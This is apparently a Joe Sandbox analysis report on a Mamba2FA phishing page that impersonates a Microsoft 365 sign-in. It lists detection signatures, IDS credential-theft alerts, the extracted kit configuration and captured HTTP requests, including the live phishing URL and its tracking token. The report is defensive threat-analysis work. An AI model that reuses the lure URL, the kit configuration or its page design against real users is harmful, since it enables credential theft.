Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
https://thewesteffect.com/n/?c3Y9bzM2NV8xX25vbSZyYW5kPVZrdFZSM009JnVpZD1VU0VSMTMxMTIwMjRVNDIxMTEzMDU=N0123N

Overview

General Information

Sample URL:https://thewesteffect.com/n/?c3Y9bzM2NV8xX25vbSZyYW5kPVZrdFZSM009JnVpZD1VU0VSMTMxMTIwMjRVNDIxMTEzMDU=N0123N
Analysis ID:1558089
Infos:

Detection

HTMLPhisher, Mamba2FA
Score:96
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

AI detected phishing page
Antivirus / Scanner detection for submitted sample
Antivirus detection for URL or domain
Found malware configuration
Suricata IDS alerts for network traffic
Yara detected HtmlPhish10
Yara detected Mamba 2FA PaaS
Detected non-DNS traffic on DNS port
HTML body contains low number of good links
HTML body contains password input but no form action
HTML title does not match URL
Invalid 'forgot password' link found
Invalid T&C link found
Suricata IDS alerts with low severity for network traffic

Classification

  • System is w10x64
  • chrome.exe (PID: 1012 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized "about:blank" MD5: 45DE480806D1B5D462A7DDE4DCEFC4E4)
    • chrome.exe (PID: 5088 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2388 --field-trial-handle=2280,i,3473752341378461948,12327758157782280307,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8 MD5: 45DE480806D1B5D462A7DDE4DCEFC4E4)
  • chrome.exe (PID: 6320 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" "https://thewesteffect.com/n/?c3Y9bzM2NV8xX25vbSZyYW5kPVZrdFZSM009JnVpZD1VU0VSMTMxMTIwMjRVNDIxMTEzMDU=N0123N" MD5: 45DE480806D1B5D462A7DDE4DCEFC4E4)
  • cleanup
{"sv": "o365_1_nom", "rand": "VktVR3M=", "uid": "USER13112024U42111305"}
SourceRuleDescriptionAuthorStrings
1.0.pages.csvJoeSecurity_Mamba2FAYara detected Mamba 2FA PaaSJoe Security
    1.0.pages.csvJoeSecurity_HtmlPhish_10Yara detected HtmlPhish_10Joe Security
      1.1.pages.csvJoeSecurity_Mamba2FAYara detected Mamba 2FA PaaSJoe Security
        1.1.pages.csvJoeSecurity_HtmlPhish_10Yara detected HtmlPhish_10Joe Security
          No Sigma rule has matched
          TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
          2024-11-18T23:43:54.882524+010020563161Successful Credential Theft Detected192.168.2.449739192.254.232.133443TCP
          2024-11-18T23:43:56.357801+010020563161Successful Credential Theft Detected192.168.2.449743192.254.232.133443TCP
          TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
          2024-11-18T23:43:53.720968+010020566432Possible Social Engineering Attempted192.168.2.449736192.254.232.133443TCP
          TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
          2024-11-18T23:43:53.643108+010020573331Successful Credential Theft Detected192.168.2.449735192.254.232.133443TCP

          Click to jump to signature section

          Show All Signature Results

          AV Detection

          barindex
          Source: https://thewesteffect.com/n/?c3Y9bzM2NV8xX25vbSZyYW5kPVZrdFZSM009JnVpZD1VU0VSMTMxMTIwMjRVNDIxMTEzMDU=N0123NAvira URL Cloud: detection malicious, Label: phishing
          Source: https://thewesteffect.com/n/?c3Y9bzM2NV8xX25vbSZyYW5kPVZrdFZSM009JnVpZD1VU0VSMTMxMTIwMjRVNDIxMTEzMDU=N0123NSlashNext: detection malicious, Label: Credential Stealing type: Phishing & Social Engineering
          Source: https://thewesteffect.com/favicon.icoAvira URL Cloud: Label: phishing
          Source: https://thewesteffect.com/n/jsnom.jsAvira URL Cloud: Label: phishing
          Source: 1.0.pages.csvMalware Configuration Extractor: Mamba2FA {"sv": "o365_1_nom", "rand": "VktVR3M=", "uid": "USER13112024U42111305"}

          Phishing

          barindex
          Source: https://thewesteffect.com/n/?c3Y9bzM2NV8xX25vbSZyYW5kPVZrdFZSM009JnVpZD1VU0VSMTMxMTIwMjRVNDIxMTEzMDU=N0123NJoe Sandbox AI: Score: 9 Reasons: The brand 'Microsoft' is well-known and typically associated with the domain 'microsoft.com'., The URL 'thewesteffect.com' does not match the legitimate domain for Microsoft., The URL does not contain any recognizable association with Microsoft, which is suspicious., The presence of input fields related to account access and creation is common in phishing attempts targeting Microsoft users. DOM: 1.1.pages.csv
          Source: Yara matchFile source: 1.0.pages.csv, type: HTML
          Source: Yara matchFile source: 1.1.pages.csv, type: HTML
          Source: Yara matchFile source: 1.0.pages.csv, type: HTML
          Source: Yara matchFile source: 1.1.pages.csv, type: HTML
          Source: https://thewesteffect.com/n/?c3Y9bzM2NV8xX25vbSZyYW5kPVZrdFZSM009JnVpZD1VU0VSMTMxMTIwMjRVNDIxMTEzMDU=N0123NHTTP Parser: Number of links: 0
          Source: https://thewesteffect.com/n/?c3Y9bzM2NV8xX25vbSZyYW5kPVZrdFZSM009JnVpZD1VU0VSMTMxMTIwMjRVNDIxMTEzMDU=N0123NHTTP Parser: <input type="password" .../> found but no <form action="...
          Source: https://thewesteffect.com/n/?c3Y9bzM2NV8xX25vbSZyYW5kPVZrdFZSM009JnVpZD1VU0VSMTMxMTIwMjRVNDIxMTEzMDU=N0123NHTTP Parser: Title: Authenticating ... does not match URL
          Source: https://thewesteffect.com/n/?c3Y9bzM2NV8xX25vbSZyYW5kPVZrdFZSM009JnVpZD1VU0VSMTMxMTIwMjRVNDIxMTEzMDU=N0123NHTTP Parser: Invalid link: Forgot password?
          Source: https://thewesteffect.com/n/?c3Y9bzM2NV8xX25vbSZyYW5kPVZrdFZSM009JnVpZD1VU0VSMTMxMTIwMjRVNDIxMTEzMDU=N0123NHTTP Parser: Invalid link: Terms of use
          Source: https://thewesteffect.com/n/?c3Y9bzM2NV8xX25vbSZyYW5kPVZrdFZSM009JnVpZD1VU0VSMTMxMTIwMjRVNDIxMTEzMDU=N0123NHTTP Parser: Invalid link: Privacy & cookies
          Source: https://thewesteffect.com/n/?c3Y9bzM2NV8xX25vbSZyYW5kPVZrdFZSM009JnVpZD1VU0VSMTMxMTIwMjRVNDIxMTEzMDU=N0123NHTTP Parser: Invalid link: Terms of use
          Source: https://thewesteffect.com/n/?c3Y9bzM2NV8xX25vbSZyYW5kPVZrdFZSM009JnVpZD1VU0VSMTMxMTIwMjRVNDIxMTEzMDU=N0123NHTTP Parser: Invalid link: Privacy & cookies
          Source: https://thewesteffect.com/n/?c3Y9bzM2NV8xX25vbSZyYW5kPVZrdFZSM009JnVpZD1VU0VSMTMxMTIwMjRVNDIxMTEzMDU=N0123NHTTP Parser: <input type="password" .../> found
          Source: https://thewesteffect.com/n/?c3Y9bzM2NV8xX25vbSZyYW5kPVZrdFZSM009JnVpZD1VU0VSMTMxMTIwMjRVNDIxMTEzMDU=N0123NHTTP Parser: No favicon
          Source: https://thewesteffect.com/n/?c3Y9bzM2NV8xX25vbSZyYW5kPVZrdFZSM009JnVpZD1VU0VSMTMxMTIwMjRVNDIxMTEzMDU=N0123NHTTP Parser: No favicon
          Source: https://thewesteffect.com/n/?c3Y9bzM2NV8xX25vbSZyYW5kPVZrdFZSM009JnVpZD1VU0VSMTMxMTIwMjRVNDIxMTEzMDU=N0123NHTTP Parser: No <meta name="author".. found
          Source: https://thewesteffect.com/n/?c3Y9bzM2NV8xX25vbSZyYW5kPVZrdFZSM009JnVpZD1VU0VSMTMxMTIwMjRVNDIxMTEzMDU=N0123NHTTP Parser: No <meta name="author".. found
          Source: https://thewesteffect.com/n/?c3Y9bzM2NV8xX25vbSZyYW5kPVZrdFZSM009JnVpZD1VU0VSMTMxMTIwMjRVNDIxMTEzMDU=N0123NHTTP Parser: No <meta name="copyright".. found
          Source: https://thewesteffect.com/n/?c3Y9bzM2NV8xX25vbSZyYW5kPVZrdFZSM009JnVpZD1VU0VSMTMxMTIwMjRVNDIxMTEzMDU=N0123NHTTP Parser: No <meta name="copyright".. found
          Source: unknownHTTPS traffic detected: 184.28.90.27:443 -> 192.168.2.4:49742 version: TLS 1.2
          Source: unknownHTTPS traffic detected: 184.28.90.27:443 -> 192.168.2.4:49756 version: TLS 1.2
          Source: unknownHTTPS traffic detected: 4.175.87.197:443 -> 192.168.2.4:49769 version: TLS 1.2
          Source: unknownHTTPS traffic detected: 4.175.87.197:443 -> 192.168.2.4:49769 version: TLS 1.2
          Source: unknownHTTPS traffic detected: 13.107.246.45:443 -> 192.168.2.4:57301 version: TLS 1.2
          Source: unknownHTTPS traffic detected: 4.175.87.197:443 -> 192.168.2.4:57302 version: TLS 1.2

          Networking

          barindex
          Source: Network trafficSuricata IDS: 2056316 - Severity 1 - ET PHISHING Generic Credential Phish Landing Page (jsnom.js) : 192.168.2.4:49739 -> 192.254.232.133:443
          Source: Network trafficSuricata IDS: 2056316 - Severity 1 - ET PHISHING Generic Credential Phish Landing Page (jsnom.js) : 192.168.2.4:49743 -> 192.254.232.133:443
          Source: Network trafficSuricata IDS: 2057333 - Severity 1 - ET PHISHING MAMBA Credential Phish Landing Page 2024-11-08 : 192.168.2.4:49735 -> 192.254.232.133:443
          Source: global trafficTCP traffic: 192.168.2.4:57299 -> 1.1.1.1:53
          Source: Network trafficSuricata IDS: 2056643 - Severity 2 - ET PHISHING Javascript Browser Fingerprinting POST Request : 192.168.2.4:49736 -> 192.254.232.133:443
          Source: unknownTCP traffic detected without corresponding DNS query: 173.222.162.32
          Source: unknownTCP traffic detected without corresponding DNS query: 184.28.90.27
          Source: unknownTCP traffic detected without corresponding DNS query: 184.28.90.27
          Source: unknownTCP traffic detected without corresponding DNS query: 184.28.90.27
          Source: unknownTCP traffic detected without corresponding DNS query: 184.28.90.27
          Source: unknownTCP traffic detected without corresponding DNS query: 184.28.90.27
          Source: unknownTCP traffic detected without corresponding DNS query: 184.28.90.27
          Source: unknownTCP traffic detected without corresponding DNS query: 184.28.90.27
          Source: unknownTCP traffic detected without corresponding DNS query: 184.28.90.27
          Source: unknownTCP traffic detected without corresponding DNS query: 184.28.90.27
          Source: unknownTCP traffic detected without corresponding DNS query: 184.28.90.27
          Source: unknownTCP traffic detected without corresponding DNS query: 184.28.90.27
          Source: unknownTCP traffic detected without corresponding DNS query: 184.28.90.27
          Source: unknownTCP traffic detected without corresponding DNS query: 184.28.90.27
          Source: unknownTCP traffic detected without corresponding DNS query: 184.28.90.27
          Source: unknownTCP traffic detected without corresponding DNS query: 184.28.90.27
          Source: unknownTCP traffic detected without corresponding DNS query: 184.28.90.27
          Source: unknownTCP traffic detected without corresponding DNS query: 184.28.90.27
          Source: unknownTCP traffic detected without corresponding DNS query: 184.28.90.27
          Source: unknownTCP traffic detected without corresponding DNS query: 4.175.87.197
          Source: unknownTCP traffic detected without corresponding DNS query: 4.175.87.197
          Source: unknownTCP traffic detected without corresponding DNS query: 4.175.87.197
          Source: unknownTCP traffic detected without corresponding DNS query: 4.175.87.197
          Source: unknownTCP traffic detected without corresponding DNS query: 4.175.87.197
          Source: unknownTCP traffic detected without corresponding DNS query: 4.175.87.197
          Source: unknownTCP traffic detected without corresponding DNS query: 4.175.87.197
          Source: unknownTCP traffic detected without corresponding DNS query: 4.175.87.197
          Source: unknownTCP traffic detected without corresponding DNS query: 4.175.87.197
          Source: unknownTCP traffic detected without corresponding DNS query: 4.175.87.197
          Source: unknownTCP traffic detected without corresponding DNS query: 4.175.87.197
          Source: unknownTCP traffic detected without corresponding DNS query: 4.175.87.197
          Source: unknownTCP traffic detected without corresponding DNS query: 4.175.87.197
          Source: unknownTCP traffic detected without corresponding DNS query: 4.175.87.197
          Source: unknownTCP traffic detected without corresponding DNS query: 4.175.87.197
          Source: unknownTCP traffic detected without corresponding DNS query: 4.175.87.197
          Source: unknownTCP traffic detected without corresponding DNS query: 1.1.1.1
          Source: unknownTCP traffic detected without corresponding DNS query: 1.1.1.1
          Source: unknownTCP traffic detected without corresponding DNS query: 1.1.1.1
          Source: unknownTCP traffic detected without corresponding DNS query: 1.1.1.1
          Source: unknownTCP traffic detected without corresponding DNS query: 4.175.87.197
          Source: unknownTCP traffic detected without corresponding DNS query: 4.175.87.197
          Source: unknownTCP traffic detected without corresponding DNS query: 4.175.87.197
          Source: unknownTCP traffic detected without corresponding DNS query: 4.175.87.197
          Source: unknownTCP traffic detected without corresponding DNS query: 4.175.87.197
          Source: unknownTCP traffic detected without corresponding DNS query: 4.175.87.197
          Source: unknownTCP traffic detected without corresponding DNS query: 4.175.87.197
          Source: unknownTCP traffic detected without corresponding DNS query: 4.175.87.197
          Source: unknownTCP traffic detected without corresponding DNS query: 4.175.87.197
          Source: unknownTCP traffic detected without corresponding DNS query: 4.175.87.197
          Source: unknownTCP traffic detected without corresponding DNS query: 4.175.87.197
          Source: global trafficHTTP traffic detected: GET /n/?c3Y9bzM2NV8xX25vbSZyYW5kPVZrdFZSM009JnVpZD1VU0VSMTMxMTIwMjRVNDIxMTEzMDU=N0123N HTTP/1.1Host: thewesteffect.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"Upgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Sec-Fetch-Site: noneSec-Fetch-Mode: navigateSec-Fetch-User: ?1Sec-Fetch-Dest: documentAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
          Source: global trafficHTTP traffic detected: GET /n/jsnom.js HTTP/1.1Host: thewesteffect.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://thewesteffect.com/n/?c3Y9bzM2NV8xX25vbSZyYW5kPVZrdFZSM009JnVpZD1VU0VSMTMxMTIwMjRVNDIxMTEzMDU=N0123NAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
          Source: global trafficHTTP traffic detected: GET /4.7.5/socket.io.min.js HTTP/1.1Host: cdn.socket.ioConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"Origin: https://thewesteffect.comsec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: corsSec-Fetch-Dest: scriptReferer: https://thewesteffect.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
          Source: global trafficHTTP traffic detected: GET /n/jsnom.js HTTP/1.1Host: thewesteffect.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
          Source: global trafficHTTP traffic detected: GET /shared/1.0/content/images/microsoft_logo_564db913a7fa0ca42727161c6d031bef.svg HTTP/1.1Host: aadcdn.msauth.netConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://thewesteffect.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
          Source: global trafficHTTP traffic detected: GET /shared/1.0/content/images/picker_verify_fluent_authenticator_59892f1e05e3adf9fd2f71b42d92a27f.svg HTTP/1.1Host: aadcdn.msauth.netConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://thewesteffect.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
          Source: global trafficHTTP traffic detected: GET /shared/1.0/content/images/picker_verify_sms_12b7d768ba76f2e782cc74e328171091.svg HTTP/1.1Host: aadcdn.msauth.netConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://thewesteffect.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
          Source: global trafficHTTP traffic detected: GET /shared/1.0/content/images/backgrounds/2_11d9e3bcdfede9ce5ce5ace2d129f1c4.svg HTTP/1.1Host: aadcdn.msauth.netConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://thewesteffect.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
          Source: global trafficHTTP traffic detected: GET /shared/1.0/content/images/arrow_left_a9cc2824ef3517b6c4160dcf8ff7d410.svg HTTP/1.1Host: logincdn.msauth.netConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://thewesteffect.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
          Source: global trafficHTTP traffic detected: GET /favicon.ico HTTP/1.1Host: thewesteffect.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://thewesteffect.com/n/?c3Y9bzM2NV8xX25vbSZyYW5kPVZrdFZSM009JnVpZD1VU0VSMTMxMTIwMjRVNDIxMTEzMDU=N0123NAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
          Source: global trafficHTTP traffic detected: GET /4.7.5/socket.io.min.js HTTP/1.1Host: cdn.socket.ioConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
          Source: global trafficHTTP traffic detected: GET /favicon.ico HTTP/1.1Host: thewesteffect.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
          Source: global trafficHTTP traffic detected: GET /w3css/4/w3.css HTTP/1.1Host: www.w3schools.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: text/css,*/*;q=0.1Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: styleReferer: https://thewesteffect.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
          Source: global trafficHTTP traffic detected: GET /shared/1.0/content/images/picker_verify_code_b41922ebdaebec16b19999fc6054a15a.svg HTTP/1.1Host: aadcdn.msftauth.netConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://thewesteffect.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
          Source: global trafficHTTP traffic detected: GET /fs/windows/config.json HTTP/1.1Connection: Keep-AliveAccept: */*Accept-Encoding: identityIf-Unmodified-Since: Tue, 16 May 2017 22:58:00 GMTRange: bytes=0-2147483646User-Agent: Microsoft BITS/7.8Host: fs.microsoft.com
          Source: global trafficHTTP traffic detected: GET /shared/1.0/content/images/microsoft_logo_564db913a7fa0ca42727161c6d031bef.svg HTTP/1.1Host: aadcdn.msauth.netConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
          Source: global trafficHTTP traffic detected: GET /shared/1.0/content/images/backgrounds/2_11d9e3bcdfede9ce5ce5ace2d129f1c4.svg HTTP/1.1Host: aadcdn.msauth.netConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
          Source: global trafficHTTP traffic detected: GET /shared/1.0/content/images/picker_verify_sms_12b7d768ba76f2e782cc74e328171091.svg HTTP/1.1Host: aadcdn.msauth.netConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
          Source: global trafficHTTP traffic detected: GET /shared/1.0/content/images/picker_verify_fluent_authenticator_59892f1e05e3adf9fd2f71b42d92a27f.svg HTTP/1.1Host: aadcdn.msauth.netConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
          Source: global trafficHTTP traffic detected: GET /shared/1.0/content/images/arrow_left_a9cc2824ef3517b6c4160dcf8ff7d410.svg HTTP/1.1Host: logincdn.msauth.netConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
          Source: global trafficHTTP traffic detected: GET /shared/1.0/content/images/picker_verify_code_b41922ebdaebec16b19999fc6054a15a.svg HTTP/1.1Host: aadcdn.msftauth.netConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
          Source: global trafficHTTP traffic detected: GET /SLS/%7B522D76A4-93E1-47F8-B8CE-07C937AD1A1E%7D/x64/10.0.19045.2006/0?CH=700&L=en-GB&P=&PT=0x30&WUA=10.0.19041.1949&MK=B5bKZDxnBObbmlV&MD=p7OkZYoh HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Windows-Update-Agent/10.0.10011.16384 Client-Protocol/2.33Host: slscr.update.microsoft.com
          Source: global trafficHTTP traffic detected: GET /rules/other-Win32-v19.bundle HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
          Source: global trafficHTTP traffic detected: GET /SLS/%7BE7A50285-D08D-499D-9FF8-180FDC2332BC%7D/x64/10.0.19045.2006/0?CH=700&L=en-GB&P=&PT=0x30&WUA=10.0.19041.1949&MK=B5bKZDxnBObbmlV&MD=p7OkZYoh HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Windows-Update-Agent/10.0.10011.16384 Client-Protocol/2.33Host: slscr.update.microsoft.com
          Source: global trafficHTTP traffic detected: GET /rules/rule120600v4s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
          Source: global trafficHTTP traffic detected: GET /rules/rule120609v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
          Source: global trafficHTTP traffic detected: GET /rules/rule224902v2s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
          Source: global trafficHTTP traffic detected: GET /rules/rule120608v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
          Source: global trafficHTTP traffic detected: GET /rules/rule120402v21s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
          Source: global trafficHTTP traffic detected: GET /rules/rule120610v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
          Source: global trafficHTTP traffic detected: GET /rules/rule120612v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
          Source: global trafficHTTP traffic detected: GET /rules/rule120613v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
          Source: global trafficHTTP traffic detected: GET /rules/rule120611v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
          Source: global trafficHTTP traffic detected: GET /rules/rule120614v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
